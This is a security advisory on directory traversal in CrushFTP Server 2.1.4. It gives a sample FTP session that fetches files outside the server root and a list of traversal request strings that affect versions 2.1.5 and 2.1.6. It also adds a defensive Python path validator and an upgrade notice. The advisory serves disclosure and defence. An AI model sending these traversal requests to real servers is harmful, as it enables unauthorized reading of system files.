COMMAND

    CrushFTP Server

SYSTEMS AFFECTED

    CrushFTP Server 2.1.4

PROBLEM

    Joe Testa found the following.  CrushFTP Server 2.1.4 is a Java FTP
    server.  Multiple vulnerabilities exist which allow users to change
    directories outside of the FTP root and download files.

    The following is an illustration of  the problem.  An ftp root  of
    "c:\directory\directory" was used.

        >ftp localhost
        Connected to xxxxxxxxxx.rh.rit.edu.
        220-Welcome to CrushFTP!
        220 CrushFTP Server Ready.
        User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
        331 Username OK.  Need password.
        Password:
        230-Welcome!
        230 Password OK.  Connected.
        ftp> get ../../autoexec.bat
        200 PORT command successful. 127.0.0.1:1868
        150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
        226-Download File Size:419 bytes @ 0K/sec.
        226 Transfer complete.
        ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
        ftp> cd ...
        250 "/.../" CWD command successful.
        ftp> get command.com
        200 PORT command successful. 127.0.0.1:1870
        150 Opening ASCII mode data connection for command.com (93890 bytes).
        226-Download File Size:93890 bytes @ 92K/sec.
        226 Transfer complete.
        ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.

    The following is a list of traversal requests which affect the
    intermediate versions (v2.1.5, v2.1.6):

        NLST ..
        NLST ...
        SIZE /../../
        SIZE /.../
        NLST \..\
        NLST /../
        NLST \...\
        RETR \..\.\..\autoexec.bat
        RETR ./\...\autoexec.bat
        RETR .\.\..\..\autoexec.bat
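    As an added defensive illustration, not part of the original advisory
    or of CrushFTP's own code, the following path resolver rejects every
    request form listed above, including the "..." and backslash variants.
    It assumes the server tracks the virtual root and working directory as
    POSIX-style paths and maps them onto a constructed on-disk root.

```python
import posixpath
import re

# Components made only of dots: "..", "...", "...." and so on.
DOT_ONLY = re.compile(r"^\.{2,}$")


class TraversalError(ValueError):
    """Raised when a request would leave the FTP root."""


def normalize_components(path: str) -> list:
    # Treat backslashes like forward slashes so "\..\" equals "/../",
    # and drop empty and "." components ("./", "//").
    return [c for c in path.replace("\\", "/").split("/") if c not in ("", ".")]


def resolve_virtual_path(cwd: str, requested: str) -> str:
    """Return the virtual path (rooted at '/') that `requested` names,
    or raise TraversalError if it would escape the root."""
    # An argument starting with either slash style is absolute.
    stack = [] if requested[:1] in ("/", "\\") else normalize_components(cwd)
    for comp in normalize_components(requested):
        if DOT_ONLY.match(comp):
            if comp != "..":
                # "..." is never a legitimate name here, and some Windows
                # path layers collapse it like "..": refuse it outright.
                raise TraversalError(f"dot-only component in {requested!r}")
            if not stack:
                raise TraversalError(f"escapes root: {requested!r}")
            stack.pop()
        else:
            stack.append(comp)
    return "/" + "/".join(stack)


def is_safe(cwd: str, requested: str) -> bool:
    try:
        resolve_virtual_path(cwd, requested)
        return True
    except TraversalError:
        return False


def to_disk_path(root: str, virtual: str) -> str:
    """Map a validated virtual path onto the on-disk root (a constructed
    path such as /srv/ftp), re-checking containment as defence in depth."""
    root = posixpath.normpath(root)
    disk = posixpath.normpath(posixpath.join(root, virtual.lstrip("/")))
    if disk != root and not disk.startswith(root + "/"):
        raise TraversalError(f"outside root: {disk!r}")
    return disk
```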

SOLUTION

    Upgrade to v2.1.7 at:

        http://www.crushftp.com